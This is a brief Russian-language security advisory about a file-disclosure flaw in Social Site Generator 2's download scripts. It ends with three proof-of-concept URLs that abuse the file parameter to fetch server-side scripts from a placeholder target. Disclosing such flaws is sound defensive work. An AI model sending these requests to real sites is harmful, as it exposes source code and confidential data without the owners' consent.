Программа: Social Site Generator 2

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных в сценариях filedload.php, download.php и
download_file.php. Атакующий может получить несанкционированный доступ к
конфиденциальной информации на целевой системе.

Эксплоит:

http://target/path/filedload.php?file=filedload.php
http://target/path/webadmin/download.php?file=download.php
http://target/path/webadmin/download_file.php



Оставить мнение